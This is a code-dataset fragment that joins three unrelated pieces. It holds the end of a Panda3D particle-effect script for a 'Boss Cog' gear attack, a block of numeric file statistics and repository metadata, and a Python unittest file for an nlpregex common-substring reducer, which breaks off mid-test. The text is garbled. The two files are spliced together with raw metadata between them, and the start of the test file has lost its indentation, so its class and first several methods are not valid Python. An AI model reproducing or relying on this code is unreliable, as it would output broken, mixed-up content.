p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
p0.emitter.setRadius(0.0200)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters: one-over-r sink just below the emitter plus a -y drift.
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -4.0000), LinearDistanceForce.FTONEOVERR, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -5.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def bossCogFrontAttack(self):
# Boss Cog front attack: gear sprites sprayed rapidly (birth rate 0.005)
# from a unit sphere surface, thrown forward (-y offset force) and pulled
# down by a distant sink.
self.reset()
self.setPos(0.000, 0.000, 4.600)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(200)
p0.setBirthRate(0.0050)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.150)
p0.renderer.setFinalXScale(0.300)
p0.renderer.setInitialYScale(0.150)
p0.renderer.setFinalYScale(0.300)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, -10.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 50.0000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
| 37.640062
| 207
| 0.726515
| 23,778
| 195,239
| 5.96194
| 0.021322
| 0.043559
| 0.032378
| 0.0261
| 0.948788
| 0.939124
| 0.925044
| 0.92316
| 0.913899
| 0.897251
| 0
| 0.138925
| 0.145985
| 195,239
| 5,186
| 208
| 37.64732
| 0.711294
| 0.081142
| 0
| 0.857209
| 0
| 0
| 0.053354
| 0.022376
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01907
| false
| 0
| 0.000465
| 0
| 0.019535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82ed17dbe78d72616b8b39524372b799ce6630b4
| 63,814
|
py
|
Python
|
regular_language/unit_tests/test_common_substring_reducer.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | 1
|
2021-12-03T07:20:18.000Z
|
2021-12-03T07:20:18.000Z
|
regular_language/unit_tests/test_common_substring_reducer.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | null | null | null |
regular_language/unit_tests/test_common_substring_reducer.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Unit Tests for common_substring_reducer.py."""
import unittest
import nlpregex.regular_language.ast
import nlpregex.regular_language.sse_forrest
import nlpregex.regular_language.common_substring_reducer
from nlpregex.regular_language.unit_tests.test_sse_asforrest_helper import test_sse_ASForrest_helper
class test_CommonSubstringReducer( unittest.TestCase ):
def __init__( self, *args, **kwargs ):
# Forward construction arguments to unittest.TestCase, then attach the
# shared helper used by every test to build AST forrests from text specs.
unittest.TestCase.__init__(self, *args, **kwargs)
self.helper = test_sse_ASForrest_helper()
def create_initial_serial_node( self, forrest, children ):
    """Build a serial ('s') AST node in *forrest* over *children*.

    Degenerate cases: an empty child list yields an epsilon ('e') node,
    and a single child yields a plain node for that child with no serial
    wrapper. Otherwise every child is attached to the serial root with a
    directed edge and the root's regex string is regenerated.
    """
    if not children:
        return forrest.create_initial_node('e')
    if len(children) == 1:
        return forrest.create_initial_node(children[0])
    serial_root = forrest.create_initial_node('s')
    for label in children:
        child_node = forrest.create_initial_node(label)
        edge = nlpregex.regular_language.sse_forrest.sseASTEdge()
        edge.add_to_graph(forrest, serial_root, child_node, "directed")
    serial_root.generate_regex()
    return serial_root
def add_question_node( self, forrest, n ):
    """Wrap node *n* under a new optional ('?') node and return the wrapper."""
    question_root = forrest.create_initial_node('?')
    edge = nlpregex.regular_language.sse_forrest.sseASTEdge()
    edge.add_to_graph(forrest, question_root, n, "directed")
    question_root.generate_regex()
    return question_root
def test_constructor_0001( self ):
# A freshly constructed reducer starts empty and with both reduction
# thresholds (min subtrees, min terms) defaulting to 2.
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 0 )
self.assertEqual( len(reducer01.series_nodes), 0 )
self.assertEqual( reducer01.min_num_subtrees, 2 )
self.assertEqual( reducer01.min_num_terms, 2 )
def test_find_series_nodes_0001( self ):
# find_series_nodes() must collect exactly the seven serial ('S_*') nodes
# of the spec below -- nodes 1, 2, 9, 13, 17, 21, 25 -- and nothing else.
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:|_3 |_4 |_5
S_2:|_6 |_7
|_3:T1_8 S_9
S_9:T2_10 T3_11
|_4:T4_12 S_13
S_13:T5_14 T6_15
|_5:T1_16 S_17
S_17:T2_18 T3_19
|_6:T1_20 S_21
S_21:T2_22 T3_23
|_7:T4_24 S_25
S_25:T5_26 T6_27
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
self.assertEqual( len(reducer01.series_nodes), 7)
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
series09 = self.helper.get_node( forrest01, 9 )
series13 = self.helper.get_node( forrest01, 13 )
series17 = self.helper.get_node( forrest01, 17 )
series21 = self.helper.get_node( forrest01, 21 )
series25 = self.helper.get_node( forrest01, 25 )
# Sort for a deterministic comparison against the expected node order.
sorted_unions = sorted( reducer01.series_nodes )
self.assertEqual( sorted_unions[0], series01 )
self.assertEqual( sorted_unions[1], series02 )
self.assertEqual( sorted_unions[2], series09 )
self.assertEqual( sorted_unions[3], series13 )
self.assertEqual( sorted_unions[4], series17 )
self.assertEqual( sorted_unions[5], series21 )
self.assertEqual( sorted_unions[6], series25 )
def test_construct_map_series_pair_0001( self ):
# Two series share the substring T2 T3 T4 starting at position 1 in both.
# Expect three map entries: the maximal match 't2%t3%t4' and its two
# 2-term windows 't2%t3' (pos 1) and 't3%t4' (pos 2).
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T2_10 T3_11 T4_12 T8_13 T9_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['t2%t3%t4']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 1)
self.assertEqual( len(positions01_02), 1)
self.assertEqual( 1 in positions01_01, True)
self.assertEqual( 1 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t2%t3']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 1)
self.assertEqual( len(positions02_02), 1)
self.assertEqual( 1 in positions02_01, True)
self.assertEqual( 1 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['t3%t4']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 2 in positions03_01, True)
self.assertEqual( 2 in positions03_02, True)
def test_construct_map_series_pair_0002( self ):
# The two series share no terminals at all, so no common substring may
# be registered and the map stays empty.
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T10_12 T11_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 0)
def test_construct_map_series_pair_0003( self ):
# T1, T3 and T5 occur in both series but never as an adjacent run of two
# or more, so no substring reaches the 2-term minimum: the map stays empty.
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T1_9 T8_10 T3_11 T10_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 0)
def test_construct_map_series_pair_0004( self ):
# The only shared 2-term substring is T1 T2: position 0 in S_1 and
# position 1 in S_2 (whose children run T2 T1 T2 ...). Exactly one entry.
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T2_9 T1_10 T2_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 1)
nodes01 = reducer01.map_regex_to_node_set['t1%t2']
self.assertEqual( len(nodes01), 2)
positions01 = nodes01[series01]
positions02 = nodes01[series02]
self.assertEqual( len(positions01), 1)
self.assertEqual( len(positions02), 1)
self.assertEqual( 0 in positions01, True)
self.assertEqual( 1 in positions02, True)
def test_construct_map_series_pair_0005( self ):
# The only shared 2-term substring is T2 T3: position 1 in S_1 and
# position 0 in S_2. Exactly one map entry is expected.
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T2_9 T3_10 T2_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 1)
nodes01 = reducer01.map_regex_to_node_set['t2%t3']
self.assertEqual( len(nodes01), 2)
positions01 = nodes01[series01]
positions02 = nodes01[series02]
self.assertEqual( len(positions01), 1)
self.assertEqual( len(positions02), 1)
self.assertEqual( 1 in positions01, True)
self.assertEqual( 0 in positions02, True)
def test_construct_map_series_pair_0006( self ):
# Both series begin with T1 T2 T3. Expect the maximal match 't1%t2%t3'
# plus its 2-term windows 't1%t2' (pos 0) and 't2%t3' (pos 1).
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T1_9 T2_10 T3_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['t1%t2%t3']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 1)
self.assertEqual( len(positions01_02), 1)
self.assertEqual( 0 in positions01_01, True)
self.assertEqual( 0 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t1%t2']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 1)
self.assertEqual( len(positions02_02), 1)
self.assertEqual( 0 in positions02_01, True)
self.assertEqual( 0 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['t2%t3']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 1 in positions03_01, True)
self.assertEqual( 1 in positions03_02, True)
def test_construct_map_series_pair_0007( self ):
    """Two series sharing t4 t5 t6 at different offsets (3 vs 2) yield three substrings."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    spec01 = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T4_11 T5_12 T6_13 T12_14
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    reducer01.find_series_nodes()
    reducer01.construct_map_series_pairs()
    self.assertEqual( len(reducer01.series_nodes), 2 )
    series01 = self.helper.get_node( forrest01, 1 )
    series02 = self.helper.get_node( forrest01, 2 )
    # regex -> ( expected positions in series01, expected positions in series02 )
    expected = {
        't4%t5%t6': ( [3], [2] ),
        't4%t5':    ( [3], [2] ),
        't5%t6':    ( [4], [3] ),
    }
    self.assertEqual( len(reducer01.map_regex_to_node_set), len(expected) )
    for regex, ( want01, want02 ) in expected.items():
        nodes = reducer01.map_regex_to_node_set[regex]
        self.assertEqual( len(nodes), 2 )
        positions01 = nodes[series01]
        positions02 = nodes[series02]
        self.assertEqual( len(positions01), len(want01) )
        self.assertEqual( len(positions02), len(want02) )
        # assertIn gives a clearer failure message than assertEqual(x in y, True).
        for pos in want01:
            self.assertIn( pos, positions01 )
        for pos in want02:
            self.assertIn( pos, positions02 )
def test_construct_map_series_pair_0008( self ):
    """Two series sharing t3 t4 t5 at offsets 2 vs 3 yield three common substrings."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    spec01 = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T3_12 T4_13 T5_14
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    reducer01.find_series_nodes()
    reducer01.construct_map_series_pairs()
    self.assertEqual( len(reducer01.series_nodes), 2 )
    series01 = self.helper.get_node( forrest01, 1 )
    series02 = self.helper.get_node( forrest01, 2 )
    # regex -> ( expected positions in series01, expected positions in series02 )
    expected = {
        't3%t4%t5': ( [2], [3] ),
        't3%t4':    ( [2], [3] ),
        't4%t5':    ( [3], [4] ),
    }
    self.assertEqual( len(reducer01.map_regex_to_node_set), len(expected) )
    for regex, ( want01, want02 ) in expected.items():
        nodes = reducer01.map_regex_to_node_set[regex]
        self.assertEqual( len(nodes), 2 )
        positions01 = nodes[series01]
        positions02 = nodes[series02]
        self.assertEqual( len(positions01), len(want01) )
        self.assertEqual( len(positions02), len(want02) )
        # assertIn gives a clearer failure message than assertEqual(x in y, True).
        for pos in want01:
            self.assertIn( pos, positions01 )
        for pos in want02:
            self.assertIn( pos, positions02 )
def test_construct_map_series_pair_0009( self ):
    """Two series sharing the suffix t4 t5 t6 at the same offset yield three substrings."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    spec01 = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T4_12 T5_13 T6_14
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    reducer01.find_series_nodes()
    reducer01.construct_map_series_pairs()
    self.assertEqual( len(reducer01.series_nodes), 2 )
    series01 = self.helper.get_node( forrest01, 1 )
    series02 = self.helper.get_node( forrest01, 2 )
    # regex -> ( expected positions in series01, expected positions in series02 )
    expected = {
        't4%t5%t6': ( [3], [3] ),
        't4%t5':    ( [3], [3] ),
        't5%t6':    ( [4], [4] ),
    }
    self.assertEqual( len(reducer01.map_regex_to_node_set), len(expected) )
    for regex, ( want01, want02 ) in expected.items():
        nodes = reducer01.map_regex_to_node_set[regex]
        self.assertEqual( len(nodes), 2 )
        positions01 = nodes[series01]
        positions02 = nodes[series02]
        self.assertEqual( len(positions01), len(want01) )
        self.assertEqual( len(positions02), len(want02) )
        # assertIn gives a clearer failure message than assertEqual(x in y, True).
        for pos in want01:
            self.assertIn( pos, positions01 )
        for pos in want02:
            self.assertIn( pos, positions02 )
def test_construct_map_series_pair_0010( self ):
    """Two identical series of t1 t2 t3 repeated twice yield 12 common substrings."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    spec01 = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T1_6 T2_7 T3_8
S_2:T1_9 T2_10 T3_11 T1_12 T2_13 T3_14
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    reducer01.find_series_nodes()
    reducer01.construct_map_series_pairs()
    self.assertEqual( len(reducer01.series_nodes), 2 )
    series01 = self.helper.get_node( forrest01, 1 )
    series02 = self.helper.get_node( forrest01, 2 )
    # regex -> ( expected positions in series01, expected positions in series02 ).
    # Short substrings occur twice (at both repetitions); longer ones only once.
    expected = {
        't1%t2':             ( [0, 3], [0, 3] ),
        't1%t2%t3':          ( [0, 3], [0, 3] ),
        't1%t2%t3%t1':       ( [0], [0] ),
        't1%t2%t3%t1%t2':    ( [0], [0] ),
        't1%t2%t3%t1%t2%t3': ( [0], [0] ),
        't2%t3':             ( [1, 4], [1, 4] ),
        't2%t3%t1':          ( [1], [1] ),
        't2%t3%t1%t2':       ( [1], [1] ),
        't2%t3%t1%t2%t3':    ( [1], [1] ),
        't3%t1':             ( [2], [2] ),
        't3%t1%t2':          ( [2], [2] ),
        't3%t1%t2%t3':       ( [2], [2] ),
    }
    self.assertEqual( len(reducer01.map_regex_to_node_set), len(expected) )
    for regex, ( want01, want02 ) in expected.items():
        nodes = reducer01.map_regex_to_node_set[regex]
        self.assertEqual( len(nodes), 2 )
        positions01 = nodes[series01]
        positions02 = nodes[series02]
        self.assertEqual( len(positions01), len(want01) )
        self.assertEqual( len(positions02), len(want02) )
        # assertIn gives a clearer failure message than assertEqual(x in y, True).
        for pos in want01:
            self.assertIn( pos, positions01 )
        for pos in want02:
            self.assertIn( pos, positions02 )
# Self-overlap
def test_construct_map_series_pair_0011( self ):
    """Self-overlap: a single series of t1 t2 t3 repeated twice pairs with itself."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    spec01 = '''
R_0:S_1
S_1:T1_3 T2_4 T3_5 T1_6 T2_7 T3_8
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    reducer01.find_series_nodes()
    reducer01.construct_map_series_pairs()
    self.assertEqual( len(reducer01.series_nodes), 1 )
    series01 = self.helper.get_node( forrest01, 1 )
    # regex -> expected positions within the single series.
    expected = {
        't1%t2':    [0, 3],
        't1%t2%t3': [0, 3],
        't2%t3':    [1, 4],
    }
    self.assertEqual( len(reducer01.map_regex_to_node_set), len(expected) )
    for regex, want01 in expected.items():
        nodes = reducer01.map_regex_to_node_set[regex]
        self.assertEqual( len(nodes), 1 )
        positions01 = nodes[series01]
        self.assertEqual( len(positions01), len(want01) )
        # assertIn gives a clearer failure message than assertEqual(x in y, True).
        for pos in want01:
            self.assertIn( pos, positions01 )
def test_construct_map_series_pair_0012( self ):
    """Common substrings spanning union ( t10 | t11 ) and optional t12 ? subtrees."""
    forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
    spec01 = '''
R_0:S_1 S_2
S_1:T1_3 |_4 T3_5 ?_6 T5_7 T6_8
S_2:T7_9 T8_10 |_11 T3_12 ?_13 T9_14
|_4:T10_15 T11_16
?_6:T12_17
|_11:T10_18 T11_19
?_13:T12_20
'''
    root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
    forrest01.add_root(root01)
    forrest01.visit_and_prepare_for_reduction( root01 )
    reducer01.find_series_nodes()
    reducer01.construct_map_series_pairs()
    self.assertEqual( len(reducer01.series_nodes), 2 )
    series01 = self.helper.get_node( forrest01, 1 )
    series02 = self.helper.get_node( forrest01, 2 )
    # regex -> ( expected positions in series01, expected positions in series02 )
    expected = {
        '( t10 | t11 )%t3':        ( [1], [2] ),
        't3%t12 ?':                ( [2], [3] ),
        '( t10 | t11 )%t3%t12 ?':  ( [1], [2] ),
    }
    self.assertEqual( len(reducer01.map_regex_to_node_set), len(expected) )
    for regex, ( want01, want02 ) in expected.items():
        nodes = reducer01.map_regex_to_node_set[regex]
        self.assertEqual( len(nodes), 2 )
        positions01 = nodes[series01]
        positions02 = nodes[series02]
        self.assertEqual( len(positions01), len(want01) )
        self.assertEqual( len(positions02), len(want02) )
        # assertIn gives a clearer failure message than assertEqual(x in y, True).
        for pos in want01:
            self.assertIn( pos, positions01 )
        for pos in want02:
            self.assertIn( pos, positions02 )
def test_find_best_regex_0001( self ):
    """The longest shared run t2 t3 t4 beats its shorter sub-substrings."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T2_10 T3_11 T4_12 T8_13 T9_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't2%t3%t4' )
def test_find_best_regex_0002( self ):
    """Series with no terminals in common produce no candidate regex."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T10_12 T11_13 T12_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, '' )
def test_find_best_regex_0003( self ):
    """Only isolated (non-adjacent) shared terminals: no substring qualifies."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T1_9 T8_10 T3_11 T10_12 T5_13 T12_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, '' )
def test_find_best_regex_0004( self ):
    """A two-terminal overlap t1 t2 is the best available substring."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T2_9 T1_10 T2_11 T8_12 T5_13 T12_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't1%t2' )
def test_find_best_regex_0005( self ):
    """The shared pair t2 t3 is selected as the best substring."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T2_9 T3_10 T2_11 T8_12 T5_13 T12_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't2%t3' )
def test_find_best_regex_0006( self ):
    """The shared prefix t1 t2 t3 is the best substring."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
    reducer = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forest )
    spec = '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T1_9 T2_10 T3_11 T8_12 T5_13 T12_14
'''
    root = self.helper.construct_ast_from_spec( forest, spec )
    forest.add_root( root )
    forest.visit_and_prepare_for_reduction( root )
    reducer.find_series_nodes()
    reducer.construct_map_series_pairs()
    best_regex = reducer.find_best_regex()
    self.assertEqual( best_regex, 't1%t2%t3' )
def test_find_best_regex_0007( self ):
    """A shared mid-series run t4 t5 t6 at different offsets is found."""
    forest = nlpregex.regular_language.sse_forrest.sseASForrest()
